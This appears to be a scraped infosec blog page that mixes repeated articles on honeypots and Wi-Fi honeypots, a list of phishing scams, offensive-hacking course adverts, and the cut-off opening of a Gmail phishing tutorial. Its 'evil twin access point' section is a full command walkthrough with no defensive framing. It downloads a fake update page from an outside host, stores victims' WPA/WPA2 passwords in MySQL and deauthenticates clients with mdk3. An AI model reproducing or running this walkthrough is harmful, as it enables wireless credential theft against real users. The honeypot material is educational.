How can we Define a Honeypot?

 

How can we define honeypots?

A honeypot is essentially a computer system. In this computer system, there exists files and directories just like any other usual computer system. A honeypot aims to attract an attacker to fall into its trap for it to investigate his actions and follow his behavior. In fact, a honeypot is not an actual system yet; it is a fake system. The difference between a honeypot and other security systems lies in the fact that a variety of security problems could be tackled at once using diverse approaches available on honeypots. On the contrary, other usual security systems are used to tackle one certain problem through a proposed solution. An instance of this point could be simply seen in the scenario when a compromised system could be investigated after having a log of malicious activity. At the same time, new threats could be recognized through implementing a honeypot in a network and hence attempt to tackle these problems and overcome them effectively.

 

Honeypots are indistinguishable from the actual production servers to an outside attacker. Thus, they will not behave any differently when attacking them. However, the network security team can monitor the honeypots for recorded attacks and later analyze them. The honeypots can also help to absorb attacks directed against the real server.

 

What is the motivation behind a honeypot?

The honeypot idea is mainly derived from a great interest in the field of computer security. The implementation of a honeypot requires that one is interested to know the workflow of security systems and to build a solid knowledge of how the protection of a company could be achieved and how security flaws in a system can be very risky for the entire system and organization. A network administrator shall be ready for great work ahead while implementing the honeypot system in a network. Being aware of the system and network architecture and the modifications that could be applied to them is a very crucial step beforehand. The output is examined through some reliable forensic science tools. In the meanwhile, several problems will be encountered, and the administrator has to make sure he can solve them before putting the honeypot in the system. Facing such problems beforehand will be very important for the administrator. This ensures that at a later that time, although the conditions may be intense, the system will be handled quickly, and losses will be easily recovered. Therefore, good knowledge of examining security problems and forensic science information is a must.

 

What should be done before applying a honeypot to the real production system?

A network administrator should carry out some research by the time he thinks of applying the honeypot concept in the network. He has to be sure that the created honeypot is secured such that it has no leaks into the actual system. Otherwise, it will make a real disaster. On the other hand, he has to make sure that a hacker has no knowledge about being trapped into a honeypot. He has also to be aware of the maximum amount of information available for an attacker to get through the honeypot implementation. Also, it is good to know the behavior of an attacker when he knows that he is in a trap. Will that attacker just give up hacking and stop his actions? It is also really important for a network administrator to be knowledgeable of the location where the honeypot should be deployed in the network and the amount of information he can get.

Laws always play a role in everything in life. Therefore, it is also advisable that a network administrator should be aware of the restrictions applied on implementing honeypots; especially if his organization is in the European Union (EU) or the United State of America (USA). There are certain rules and regulations which govern the process of obtaining information of an attacker or tracking him back. Therefore, a network administrator should abide by these rules by not fully tracking the attacker, and at the same, he should be respectful of the laws in every single way.

What is the description of our problem?

 When we build a good honeypot, we expect to attract several attackers into the fake system and let them take control over the intentional flaws left in there. When we trace the hacker, it is not guaranteed for sure whether we will be the ones who have the control. Thus, we don’t know that much about the security of a honeypot. We are not sure whether the attacker, in fact, knows that it is a fake system. We also doubt whether the attacker is aware of the great importance of acquiring information about the system flaws. We need to be very specific and certain about the actual limits that an attacker has whenever he gets the control over the honeypot system. It will be disappointing if the attacker can even exploit the honeypot itself and seize a flaw in it to get to the system and do what he wants in the system. The entire system will be compromised when an attacker gets to this devastating point. Another entitled problem is that an attacker may recognize that it is a trap and then stop hacking or pretend that he is hacking. In that time, it is no longer beneficial to have the installed honeypot anymore, and it is not useful either to use our forensics tool to investigate the system. A very important aspect to consider when using honeypots is to be sure about the answers for all these questions and attempt to get our honeypots to be more secure and be assured that hacking the honeypot by the attacker will not yield any useful data for him about the actual system. A good network administrator should play the role of a hacker once and of a forensic examiner on another occasion or simultaneously do the same of course with his own team. Very accurate results could be acquired depending on various tools used for hacking and forensics.

 

Resources:

http://www.diva-portal.org/smash/get/diva2:327476/fulltext01

https://www2.cs.arizona.edu/~collberg/Teaching/466-566/2012/Resources/presentations/2012/topic12-final/report.pdf

 

What are the Types of Honeypots?

 

A honeypot is essentially a computer system. In this computer system, there exists some files and directories like any other usual computer system. A honeypot aims to attract an attacker to fall into its trap and investigate his actions and follow his behavior. In fact, a honeypot is not an actual system but an intentionally made fake system.

 What are the types of honeypots?

 

Looking at the aims of honeypots and their levels of interactions, it is possible for us to group them into two main types: Research honeypots and Production honeypots:

  1. Research honeypots:

Military, research and government organizations mainly depend on these types of honeypots. A huge amount of data is contained in this type of honeypots. These honeypots are familiar with any new threats, and Blackhat motives could easily be recognized through such honeypots. While the main benefit of research honeypots is to understand how a system could become more secure, these types of honeypots cannot give any valuable data about increasing the security of an organization and its vulnerabilities.

  1. Production honeypots:

These types of honeypots are mainly utilized for the sake of getting an organization to become more protected against any potential attacks. The implementation of such honeypots is performed mainly inside the organization’s production network itself. The aim for them is to help increase the overall security for an organization at the end of the day.

Through such honeypots, a limited amount of data is captured such that honeypots that are lowly interactive are used. In this process, the behavior of an attacker is monitored very carefully by the proper forensics tools, such that any possible risks may be lowered and hence the organization becomes more secure consequently. These types of honeypots are the ones that are mostly used in practice, yet sometimes they may represent a risk for the organization themselves.

One thing that matters about these types of honeypots is where and how they are to be implemented by network administrators. Remember that the implementation of honeypots is essentially within a real network and system. Testing these sorts of honeypots usually yields several unexpected actions or problems.

Consequently, some other systems inside an organization may be put in danger when implementing these honeypots in the network. For an administrator, he should be fully aware that other systems will be possibly misused through the honeypots. As a result of that, he should make sure that all other systems inside the organization are secured enough after deploying the features of the honeypot. Otherwise, some great problem is to be faced by the entire organization eventually.

How to categorize honeypots according to the type of data collection?

There is, in fact, a way to classify honeypots, depending mainly on the type of data that is collected by the honeypot concerning a certain attack. A honeypot can be set up to detect and record one or more types of data: events (things that happen which change something in the honeypot), attacks (attempts by a malicious user to exploit a vulnerability), and intrusions (successful attacks that penetrate the honeypot). There is no judgment over how important a type of data is over another. However, most honeypots can display some information from each data category of the groups as mentioned earlier. In fact, all of these categories are really important for a security administrator to understand an attack and know the vulnerabilities of a system.

 

Is the usage of honeypots considered legal or not?

There are some legal issues that one should be fully aware of by the time he gets to deploy a honeypot inside an organization network or so. In fact, such legal issues are variant according to the governing rules and according to the country where a honeypot is to be deployed and configured. The regulations determine many different aspects, but mainly they care much about three main aspects which are the security of data, data collection, and the way in which honeypots are used in an organization.

These diverse laws mainly rely heavily on the quality of the data captured by a honeypot and on the person who is implementing and deploying the honeypot inside the network in the first place. The main significant issue when it comes to legalizing the usage of honeypots rely on the type of collected data and the content of it. This makes it harder for someone to determine whether using honeypots is considered a legal aspect. This is because legalizing it or not mainly depends on what the data is intended to be used for after collecting it. This mainly leaves us with several steps that one should carefully consider by the time he deploys a honeypot inside the network.

A lot of questions and approaches should be asked during the experiment as well. Things are no different when it comes to using a honeypot for a company, or for home, yet for a company, there are several other responsibilities that a network administrator should consider and take care of greatly. A network administrator is responsible for both the country laws and the company laws that come next.

It is a must to abide by these laws to remain in legal status. While some companies allow experimenting almost everything inside the company, many more other companies put several restrictions on experimenting such things within the company. By the time a honeypot is deployed, someone has to be sure about the answers of the legality of honeypots inside the company and the country as well. One has to ask the responsible ones to make sure that what he is doing does not violate current rules set by either the country or of course the company. In this regard, there are in fact three main legal issues that should be considered regarding using honeypots. The three are privacy, entrapment and civil liability

 

Resources:

http://www.diva-portal.org/smash/get/diva2:327476/fulltext01

https://www2.cs.arizona.edu/~collberg/Teaching/466-566/2012/Resources/presentations/2012/topic12-final/report.pdf

 

 

FREE Introduction to Burp Suite webinar

Burp Suite

In this FREE webinar, Joe McCray will cover the basics of Burp Suite, and how to perform common web app penetration testing tasks with it. This webinar is designed for people with little to no web app penetration testing experience.

This webinar will be held on the 1st of March, 2018 1:00 PM – 2:00 PM EST

Click the link below to sign up for this webinar:

https://attendee.gotowebinar.com/register/2243147045145300994

 

Phases and Usages of a Honeypot

 

 

 

 

 

How can we define honeypots?

A honeypot is essentially a computer system. In this computer system, there exists some files and directories like any other usual computer system. A honeypot aims to attract an attacker to fall into its trap and investigate his actions and follow his behavior. In fact, a honeypot is not an actual system yet; it is a fake intentionally made system. The difference between a honeypot and other security systems lies in the fact that a variety of security problems could be tackled at once using diverse approaches by depending on honeypots.

On the contrary, other usual security systems are used to tackle one certain problem through a proposed solution. An instance of this point could be simply seen in the scenario when a compromised system is investigated after having a log of malicious activity. At the same time, new threats could be recognized through implementing a honeypot in a network and hence an attempt to tackle these problems and overcome them effectively.

To an outside attacker, the honeypots are indistinguishable from the actual production servers. Thus, the servers will not behave any differently when attacking them. However, the network security team can monitor the honeypots for recorded attacks and later analyze them. The honeypots can also help to absorb attacks directed against the real server.

 

What is the motivation behind a honeypot?

The honeypot idea is mainly derived from a great interest in the field of computer security as a whole. The implementation of a honeypot requires that one is interested to know the workflow of security systems and to build a solid knowledge of how the protection of a company could be achieved and how security flaws in a system may be very risky for the entire system and organization. A network administrator shall be ready for a great work ahead of him while implementing the honeypot system in a network. Being aware of the system and network architecture and the modifications that could be applied to them is a very crucial step beforehand.

The output shall be examined through some reliable forensic science tools. In the meanwhile, several problems will be encountered, and the administrator has to make sure he can solve them before putting the honeypot in the system. Facing such problems before actually facing them, in reality, will be very important for the administrator. Of course, at that time, although the conditions may be intense, the system will be handled quickly, and losses will be easily recovered. Therefore, good knowledge of both examination of security problems and forensic science information is a must.

 

What should be done before applying a honeypot to the real production system?

In fact, there has to be some research carried out by the network administrator by the time he even thinks of applying the honeypot concept in the network. He has to be sure that the created honeypot is secured such that it has no leaks into the actual system. Otherwise, it will make a real disaster. On the other hand, he has to make sure that a hacker has no knowledge about being trapped into a honeypot.

He has also to be aware of the maximum amount of information available for an attacker to get through the honeypot implementation. Also, it is good to know the behavior of an attacker when he knows that he is in a trap. Will that attacker just give up hacking and stop his actions? It is also really important for a network administrator to be knowledgeable of the location where the honeypot should be deployed in the network and the amount of information he can get.

Laws always play a role in everything in life. Therefore, it is also advisable that a network administrator should be aware of the restrictions applied on implementing honeypots especially if his organization is in the European Union (EU) or the United State of America (USA). There are certain rules and regulations which govern the process of obtaining information of an attacker or tracking him back. Therefore, a network administrator should abide by these rules by not fully tracking the attacker, and at the same, he should be respectful of the laws in every single way.

 

What is the description of our problem? 

When we build a good honeypot, we expect to attract several attackers into the fake system and let them take control over the intentional flaws left in there. When we trace the hacker, it is not guaranteed for sure that we will be the ones who have the control. Thus, we don’t know much about the security of a honeypot. We are not sure whether the attacker, in fact, knows that it is a fake system.

Additionally, we doubt whether the attacker is aware of the great importance of acquiring information about the system flaws. We need to be very specific and certain about the actual limits that an attacker has whenever he gets the control over the honeypot system. It will be disappointing if the attacker can even exploit the honeypot itself and seize a flaw in it to get to the system and do what they want in the system.

The entire system will be compromised when an attacker gets to this devastating point. Another entitled problem is that an attacker may recognize that it is a trap and then stop hacking or pretend that he is hacking. During such a time, it is no longer beneficial to have the installed honeypot anymore, and it is not useful either to use our forensics tool to investigate the system.

A very important aspect to consider when using honeypots is to be sure about the answers for all these questions and attempt to get our honeypots to be more secure and be assured that hacking the honeypot by the attacker will not yield any useful data for him about the actual system. A good network administrator should play the role of a hacker once and of a forensic examiner on another occasion or simultaneously of course with his own team. Very accurate results may be outputted then by depending on various tools for hacking and forensics purposes.

 

Resources:

http://www.diva-portal.org/smash/get/diva2:327476/fulltext01

https://www2.cs.arizona.edu/~collberg/Teaching/466-566/2012/Resources/presentations/2012/topic12-final/report.pdf

 

How can you Create an Evil Twin Access Point?

 

Quick introduction:

What is an evil twin access point? Basically, when it comes to security and especially Wi-Fi security, the name evil twin access point arises greatly. Basically, an attacker can imitate an actual Wi-Fi access point for the sake of getting to collect data from whoever attempts to access the network.

Installing a Wi-Fi access point with the same name and settings of another access point, and setting the access point and positioning it next to the impersonated one will most likely cause the victim user to fall in the trap. Since the two access points become twins, in fact, identical twins per say, the user will hardly be able to distinguish between the two access points and will try to access the evil access point as if it is the original one. This is because the signal strengths may be similar or even at times, the evil access point can be having the stronger signal.

Now, there are two cases: it is either the user’s device will connect automatically to an access point, which is in this case the evil access point, or the user will manually choose the stronger access point perceiving it as, the nearer one. In both cases, all the user’s sensitive data such as passwords will get intercepted by the attacker.

What do you need to set up an evil twin access point?

To be able to set up an evil twin access point, there are four main requirements:

  1. Have Kali Linux installed on your machine.
  2. Have a Wireless Network adapter.
  3. Have your machine connected to the Internet.
  4. Have a target access point.

What are the steps to accomplish the desired task?

The following steps work as a concise way to get an evil twin access point prepared for an attack:

  1. Get your Kali Linux machine opened and logged in
  2. Get the Internet connection established between your machine and the host machine.
  3. Get a DHCP server installed on your machine: this can be done by opening the terminal and typing: “apt-get install dhcp3-server “
  4. After the installation is done successfully, get the DHCP server configured with the following command:

“ nano/etc/dhcpd.conf”

A blank file should get opened into the terminal right away after executing this command.

  1. Inside the blank file, type the following, type the following lines as they are:

authoritative;

default-lease-time 600;

max-lease-time 7200;

subnet 192.168.1.128 netmask 255.255.255.128 {

option subnet-mask 255.255.255.128;

option broadcast-address 192.168.1.255;

option routers 192.168.1.129;

option domain-name-servers 8.8.8.8;

range 192.168.1.130 192.168.1.140;

}

  1. Save the file by pressing on ctrl+x and then press ‘y’
  2. You get to set the security update page downloaded; this page is the one which will appear when the user opens the browser. To be able to accomplish this task, you should change the directory to /var/www. You can simply type the following command for this sake:

“cd /var/www”

  1. Now that you changed the work directory, you get to type the following commands in their order:

rm index.html

wget http://hackthistv.com/eviltwin.zip

unzip eviltwin.zip

rm eviltwin.zip

  1. Get the apache server opened now and mysql as well. The following commands respectively should do this task for you:

/etc/init.d/apache2 start

/etc/init.d/mysql start

  1. Get a database created to be able to store the users’ WPA/WPA2 passwords when they enter the security update page. The following commands are very effective to do this task for you now:

mysql -u root

create database evil_twin;

use evil_twin

create table wpa_keys(password varchar(64), confirm varchar(64));

Don’t close the MySQL page or terminal after this step.

  1. Get to know the interface name of the local network adapter and know the local IP as well. To do that, get a new separate terminal opened and type the following commands inside it:

ip route

airmon-ng

airmon-ng start wlan0

clear

when you type the first command of this list: (take note of local IP n wired interface): the interface name is the one which appears after “eth0” and the local IP appears after “src”

  1. Type the following commands now:

airodump-ng-oui-update

airodump-ng -M mon0 (take note of the target essid,bssid and channel number which all appear after this command)

airbase-ng -e [ESSID] -c [ch. #] -P mon0 (such that [ESSID] is your target’s ESSID and [ch. #] is the target’s channel no which you took note of after the previous command)

  1. Now, the evil access point is awesomely running. However, we need to get to configure our tunnel interface to be able to create a bridge between our evil twin access point and the wired interface. The name of our tunnel interface is at0. This was essentially created when we used “airbase” in the last step. To make such configurations, get a new separate terminal opened without closing neither the MySQL nor the airbase terminals. The following command should be typed into the new terminal now:

ifconfig at0 192.168.1.129 netmask 255.255.255.128

  1. A routing table has to be added now such that IP forwarding gets enabled. This way, traffic can go into and from our evil access point successfully. The following commands should be typed respectively to get this task done:

route add -net 192.168.1.128 netmask 255.255.255.128 gw 192.168.1.129

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables –table nat –append POSTROUTING –out-interface eth0 -j MASQUERADE

iptables –append FORWARD –in-interface at0 -j ACCEPT

iptables -t nat -A PREROUTING -p tcp –dport 80 -j DNAT –to-destination [LOCALIP ADDRESS:80]

iptables -t nat -A POSTROUTING -j MASQUERADE

dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0

etc/init.d/iscdhcp-server start

  1. Perform a De-authentication attack now. This will make it compulsory for all the connected clients to connect to the evil twin access point. We need first of all to get a blacklist file created, to contain BSSID of the target. The following command will be doing this task for you:

echo [BSSID] > blacklist

NOTE:[BSSID] BSSID of the target

mdk3 mon0 d -b blacklist -c [CH.#]

  1. Get back to the airbase terminal; there you will know whether a user is connected to the evil twin access point. He will have entered his WPA/WPA2 password by then. To view this password, get back to the MySQL terminal and type the following commands:

use evil_twin

select * from wpa_keys; {To view the password entered by the victim in our MySQL database}

  1. Congratulations! You have created the evil twin access point successfully.

 

Sources:

www.hacking-tutorial.com/hacking-tutorial/how-to-create-evil-twin-access-point/#sthash.rDbO247S.dpbs

How to understand phishing scams?

 

So, what about phishing scams?

Phishing is one of the most common social engineering attacks that has risen these days.

The following list provides some a few social engineering scams executed via phishing:

  1. Banking Link Scam:

An email could be simply sent to you to trick you to reveal some important information about yourself. Even a phony link to your bank may be sent to you such that you start to believe it is sent from your actual bank. Then, you will be tempted to enter your user-name and password. In 2015, a campaign named Carbanak was able to get about around a billion dollars from over 30 countries. This information was found by Kaspersky.

What happened exactly is that spear phishing was highly depended on. As a result, workstations got infected through the help of their own employees. Hackers were capable of tunneling deeper into the bank’s systems, taking control over employee stations. This for sure allowed them to manage to transfer cash, operate ATMs in a remote manner, get the information changed for different accounts, and do some other playful tricks on the accounts.

The problem which occurred at that time was essentially due to a phishing email sent to some employees as if it was one of their colleagues who actually sent it. However, there was a malicious code right behind the scenes. It was able to spread from there widely. In the meantime, everything that happened on the victims’ machines was recorded by the attackers for future use. When proper time came, the attackers could basically understand everything in the system and get to know what things go where. This made it pretty easy for them when it came to doing several transactions among which was the ATM hits. In addition to that, inflating bank balances then siphoning off that amount was something on the scene such that an account balance for a customer might go from $20,000 to $100,000 and the $80,000 were basically the earnings of the hacker.

 

  1. Fax Notice Scam:

A phony link to a phony fax is all that it is. However, the damage is huge when it occurs to your computer as a result. This type of scams actually appears significantly when it comes to dealing with companies that greatly rely on faxes. Firms that heavily utilize faxes are exemplified by document management firms, title companies, and other companies for insurance and other financial services.

 

  1. Dropbox Link Scam:

Even Dropbox has its surprises with regards to scams. Some security incidents occurred through the year 2014. In one of the cases, what happened is that there was a phishing email sent to victims, asking them to click on a fake link to reset their Dropbox password. After clicking the link, users were led into a page where they were prompted that their browser is out of date and they need to update it. There was a button were users were supposed to press to run their update. However, this was the trigger for a Trojan in the Zeus family of malware. Additionally, there was another phishing attack that used Dropbox. Emails were sent to victims apparently having some Dropbox links. On clicking on such links, malicious software like “CryptoWall” ransomware got into the systems.

 

  1. Court Secretary Complaint Link Scam:

This is another phony link which is meant to trick a customer who falls as a victim of phishing. It is a link that confirms a customer’s complaint. For instance, a phishing email of that sort may include a sort of prediction that a consumer is willing to complain about something very soon. The one who sends the email apparently attempts to grasp the problems that the customer has to further work on them. Using this kind of phishing was in fact very common for quite some time.

 

  1. Facebook Message Link Scam:

This type of phishing trick mainly appears at the time of death time of a celebrity. A link is sent through Messenger or shared through different pages that daisies will be pushed up from the computer through a click on the proposed link.

One vivid example of this occurred when Robin Williams died. Unfortunately, a phishing message through Facebook was greatly widespread among different users tempting them to open a link to watch the Robin Williams goodbye video. The phishing message was really to the point such that even they added more flavor to the title of the link to indicate that it is an exclusive video of Williams saying goodbye through his cell phone. When the link was clicked on by the user, they were driven into a bogus BBC website page which had nothing but some bad links leading to scam online surveys.

How is it possible for an attacker to attract more victims to the counterfeit website?

There are in fact many methods utilized by an attacker to get more victims to visit the fake website. Among these methods, the following four tricky methods exist:

  1. The phishing website gets shortened to the minimum appropriate length by the attacker.
  2. The URL gets several shares on social media websites such as WhatsApp and Viber. It is more likely that people will have the incentive to get through these phishing links there because there is no shared awareness of computer security among the users of these social groups.
  3. Social Engineering is mostly used here such that people will fall into the trap and open the links.
  4. URLs are sent by the attackers to the victims through emails especially from female names.

 

Sources

https://digitalguardian.com/blog/social-engineering-attacks-common-techniques-how-prevent-attack

Hacking GMail Using Phishing Method and Prevention

 

What is the History of Honeypots?

 

There are several ways in which researchers and developers can work to protect the software that they write. Some are proactive, like code reviews and regression testing, while others are reactive, like the pwn2own contest where new vulnerabilities are used to exploit browsers. Some tools can take on aspects of both; one class of these tools are honeypots. The term honeypot was first presented by Lance Spitzner in 1999 in a paper titled To Build a Honeypot.

 

What is the history of honeypots?

Essentially, the motivation behind the name honeypots is derived from the honeypots existing in the actual real life. As we already know, such honeypots should be resourceful of desirable things which is the honey to someone who is a child or nest of ants for instance. This honeypot could be really useful to get this person lured out. When it comes to computer honeypots, it is no different at all. The same concept applies such that a tempting target exists and becomes attractive for an attacker who finds himself tempted to exploit the target and perform his desired attack in between.

Spitzner was the first one to bring the word honeypot to the field of computer science. However, the ideology was proposed since the mid-1980s. Since then, there has been some research on how attacks are performed on systems to have their devastating effects on different organizations. In January 1991, Bill Cheswick wrote the following comments regarding his time at AT&T Bell Laboratories. He was trying to find out reasons or logs for attacks, as he explains in the following comments:

On Sunday evening, January 20, I was riveted to CNN like most people. A CNN bureau chief in Jerusalem was casting about for a gas mask. I was quite annoyed when my terminal announced a security event: 22:33 finger attempt on berferd A couple of minutes later someone used the debug command to submit commands to be executed as root – he wanted our mailer to change our password file!

These statements show how Cheswick managed to understand the commands issued by a remote attacker. He was even able to manipulate the attacker through replying to him with some modified responses on the same day. However, on the following day, Cheswick started working with his team on creating a chroot environment where they can play with the attacker and even make the attacker play there. The following words show what he did exactly as he narrated:

I wanted to watch the cracker’s keystrokes, to trace him, learn his techniques, and warn his victims. The best solution was to lure him to a sacrificial machine and tap the connection. … We constructed such a chroot “Jail” (or “roach motel”) and rigged up logged connections to it through our firewall machine. … A little later Berferd [the attacker] discovered the Jail and rattled around in it. He looked for some programs that we later learned contained his favorite security holes. To us, the Jail was not very convincing, but Berferd seemed to shrug it off as part of the strangeness of our gateway. Berferd spent a lot of time in our Jai

The attacker was recognized by Cheswick for several months. Nonetheless, the attacker was kept there inside the honeypot until Cheswick shut it down. During that time,  several attempts were made by the attacker to try to attack several other computer networks. The benefit from all his attempts lied mainly in the fact that administrators were able to find out the weak points in their networks where attacks were possible to be made. If it weren’t for the honeypot, Cheswick with his team of network administrators would not have been able to detect all of these flaws in the network of his organization. Furthermore, they were capable of recognizing where the source of the attack was. It was, in fact, coming from a Sweden guy who had a knack for subverting the system he was on. He should have had an account to do his bad deed.

Then, in 1997, Deception Toolkit 0.1 got released by Fred Cohen. This was basically like an introduction to how the structure of a honeypot should look like. Therefore, in the following year, CyberCop Sting honeypot got released to become the first commercially produced honeypot ever. In the same year, BackOfficer Friendly got released as well. It was actually a free software that was easy to use and configure. This version operated perfectly under the Microsoft Windows operating system platform. It was the beginning of increasing publicity of honeypots across the world. This is simply because a tremendous amount of people knew about it and tried it that year. Honeynet then started in 1999. It was after BlackOfficer when people became more attracted to the new trend of honeypots. There were several other papers that were written to tackle this technology and discuss new efficient implementations of honeypots. As a result, the general knowledge of people increased greatly because of the many releases and applications.

The usage of honeypots to capture any malicious activities, malicious software on the internet, detect it and raise awareness about any new threats occurred between 2000 and 2001. Since this year, honeypots became popular with organizations which cared about computer security. They implemented honeypots in their networks such that they could detect any malicious traffic going through their network and hence get their network security improved as a whole. Since 2002 till now, the concept of honeypots became familiar to the professionals in the field of computer security. Researchers and professionals worked on improving the functionalities of honeypots. Many more features were added to honeypots until their benefits became considerable for businesses and companies.

 

Resources:

http://www.diva-portal.org/smash/get/diva2:327476/fulltext01

https://www2.cs.arizona.edu/~collberg/Teaching/466-566/2012/Resources/presentations/2012/topic12-final/report.pdf

 

Offensive Cyber Expert Bundle

Do you really want to be the guy or girl that can just flat out hack! I’m talking about where it just doesn’t matter what’s in front of you – you know that you can figure it out.

It doesn’t matter if you are up against Linux, Windows Server 2016, SharePoint, web apps, or custom apps where you need to modify public exploit code to attack them.

If that’s what you want to be then this is the course bundle for you.

For today only you can purchase this entire class bundle for only $200 – just click the add to cart below:

$200.00Select options

 

linux

Being proficient in Linux in the InfoSec world today is an absolute must. This is the class that you absolutely want to take to not only get familiar with Linux but to learn how to use Linux to perform InfoSec tasks instead of just the basics of the operating system.

 

For today only you can purchase this entire class bundle for only $200 – just click the add to cart below:

$200.00Select options

 

powershell

Just like with Linux being proficient in PowerShell in the InfoSec world today is an absolute must because all of the Microsoft technologies today heavily utilize PowerShell. This is the class that you absolutely want to take to not only get familiar with PowerShell but to learn how to use PowerShell to perform InfoSec tasks.

 

For today only you can purchase this entire class bundle for only $200 – just click the add to cart below:

$200.00Select options

 

Offensive Cyber Operations
Offensive PowerShell with Cyber Range

This is the class where the rubber meets the road. This is the class where you put it all on the line and find out what works in the real world and what doesn’t. The Cyber Range is a full blown modern Windows environment (Windows Server 2016, Active Directory 2016, and SharePoint 2016 multi server farm)

 

For today only you can purchase this entire class bundle for only $200 – just click the add to cart below:

$200.00Select options

 

Exploit development

This is a fun class. 64bit exploit development. Learn how to write exploits, learn how to modify public exploit to suit your needs.

 

For today only you can purchase this entire class bundle for only $200 – just click the add to cart below:

$200.00Select options

 

 

Unlimited classes:

If you know that you are interested in this class as well as other InfoSec classes then you should consider the unlimited classes package for $49.99 per month. You can find out more about it by clicking on the link below:

https://infosecaddicts.com/unlimited-classes/

NOTE: Due to Joe McCray’s travel and work schedule (ex: short notice consulting/training engagements or changes to those engagements) classes may reschedule or cancel. In these situations a refund will NOT be granted as the class will re-run the following week, or additional days will be added to the class schedule to make up for this.

Offensive PowerShell with Cyber Range

Offensive PowerShell class with Cyber Range

On the 24th of March from 10am EST to 4pm  EST we will run the first online Offensive PowerShell course with our new Cyber range. The Cyber Range is a full blown modern Windows environment (Windows Server 2016, Active Directory 2016, and SharePoint 2016 multi server farm).

powershell

Here is your chance to use what you learned in the PowerShell class, and get a chance to use all of the popular PowerShell tools such as:

 

Cyber Range

Students will receive cyber range access on the 22nd of March and maintain access to the new cyber range until the end of April.

Support

Each student will receive access to an InfoSec Addicts Group for the class. Groups are where students can ask questions outside of the regular class hours, work with other students on lab exercises, homework, and challenges.

A class mentor is assigned to the InfoSec Addicts Group to answer questions (allow one day for responses).

Similarly, a Customer Relationship Manager is assigned to the class to manage questions and support issues.

Class Schedule

This class is going to run on Saturday the 24th of March from 10am EST to 4pm EST.

 

Class Cost

The class cost is regularly $500, but you can get it for $200 if you sign up before February 19th.

Fill out this form to sign up for the class.

$200.00Select options

 

Unlimited classes:

If you know that you are interested in this class as well as other InfoSec classes then you should consider the unlimited classes package for $49.99 per month. You can find out more about it by clicking on the link below:

https://infosecaddicts.com/unlimited-classes/

 

NOTE: Due to Joe McCray’s travel and work schedule (ex: short notice consulting/training engagements or changes to those engagements) classes may reschedule or cancel. In these situations a refund will NOT be granted as the class will re-run the following week, or additional days will be added to the class schedule to make up for this.

What is Honeyspot?

 

What are Wireless Honeypots?

There are different types of honeypot system that are commonly used as well. They are called wireless honeypots. Getting a wireless honeypot deployed in a network is mainly used for the sake of capturing the behavior of a system which resides inside a wireless network. Information and statistics about such behavior and activities could be easily gathered from such honeypots. Wireless connections contain both the technology of IEEE 802.11 and some other similar technologies like Bluetooth for instance.

Why do we use Wi-Fi honeypots?

We are basically into using Wi-Fi honeypots to track any malicious activity on the target network. To elaborate more, using some access points, a wired network, and some open-to-attack computers could simply lead to obtaining a Wi-Fi structure, right? In this structure, Wi-Fi networks are really vulnerable to enormous amounts of attacks, which urges the need for a Wi-Fi honeypot that could simple be capable of getting any unauthorized traffic captured and getting some questions answered about the possibility of catching wardriving and hackers which are collecting their forces to attack a wireless network and get it compromised.

 

What is Honeyspot? 

Honeyspot is, in fact, the name of a wireless honeypot project which got the original support from Honeynet, the Spanish project. This project is in fact considered to be the most famous honeypot projects when it comes to wireless honeypots. The reason why it has this strange name lays back in the two terms Honeypot, which is the basic idea of wireless honeypots, and hotspot, which is the basic idea of a wireless network.

The rationale beyond this honeyspot project is basically to monitor an attacker while he tries to act maliciously against a wireless network to know his behavior and actions. The traffic going through such honeyspot is only the malicious traffic. On the other hand, since any professional and experienced attacker is capable of identifying whether it is, in fact, a real system or it is a fake honeypot, it is no different when it comes to honeyspot project where same experienced attackers could recognize and distinguish between honeyspot and real systems. The way in which a honeyspot appears matter to convince the majority of attackers that it is a real system. There should be many similarities between the real system and a honeyspot system.

The aim that the team of the honeyspot project had in mind is that they needed to understand attack types, ideas that an intruder has about the system, his logic, and how he approaches the system for his purposes. The benefit of getting much information about the attack is huge such that attack should be completely identified to further prevent any similar attacks in the future. Using this collected information and data about the attack, it becomes easy to understand many flaws that WEP wireless connections have, and for sure how attackers think about that and how they try to exploit such vulnerabilities. All of the IP address spoofing, hacking of web session, and spoofing of a MAC address become all recognized and identified using Honeyspot project. Special approaches to get the clients of a wireless network hacked are also understandable with the help of the Honeyspot project. The result of all of this information and understandings, the existence of much more secured systems become achievable.

There is, in fact, a special network architecture that works best with the Honeyspot project.

The architecture consists of the following components:

  1. There has to be a Wi-Fi access point (WAP) to which clients can have access to and connect to it. An attacker is also able to connect to the WAP. This is the main source of internet connection for all its clients.
  2. There are on the other hand the wireless clients (WC) who seems to be utilizers of the network in the first place to gain access to the internet connection provided using WAP. However, all of these clients are not actual devices, and they can connect to the honeyspot network. If these clients are not real, then why on earth we have them in the first place? The basic answer to this question is that we mainly need to create traffic in the fake system. We want to show the attacker that there is traffic going through the wireless honeyspot as incoming and outcoming traffic. This gives the attacker a sense that he is attacking a real system, not a fake one. Consequently, he becomes tempted to attack the network through initially monitoring such traffic with the use of his monitoring tools used for the attack.
  3. There is also what is referred to as WMON which is a wireless monitor module. In this module, traffic gets captured such that any information about the network traffic could be retrieved and monitored. This assists security administrators in getting to understand the attacks and get information about it. This shows how important this module is.
  4. Another module exists, having the name of WDA which refers to wireless data analysis module. The work of this module mainly depends on the work of WMON in the first place. This module takes part with the administrators in the process of getting to analyze the captured traffic. Now you can see why this module relies heavily on the WMON module. While capturing data happens by WMON module, WDA comes to analyze and examine this traffic. The mechanism goes like the following: when WMON captures the records of traffic, it saves them and then sends them directly to WDA to make sense of this traffic through analyzing it to get important information from it.
  5. Finally, the last module is named WI module. This module is, in fact, a wired structure which is optional in the architecture used for honeyspot, meaning that it could exist or not in the architecture without having to worry about any problems. The idea is basically that this network structure may be designed to have a wired connection structure as well as the wireless connection. This just gives a slightly different aspect to the usual network structure used for honeyspot.

 

Resources:

http://www.diva-portal.org/smash/get/diva2:327476/fulltext01

https://www2.cs.arizona.edu/~collberg/Teaching/466-566/2012/Resources/presentations/2012/topic12-final/report.pdf

 

How to Hack Gmail using Phishing Method

 

In fact, a key answer to the proposed question in this article’s title is Wapka. So what is Wapka? It is a free platform for website creation. By using it, Gmail id, browser and IP address of a victim could be all sent. Through this website, a phishing website could be created easily without any much knowledge about PHP or MySql.

 

What do I have to get before getting into the steps?

You have to be aware of the following points before starting the steps which are to be discussed later on in this article:

1. You have to have an email account to be able to register on Wapka

2. You have to be knowledgeable of HTML to some extent.

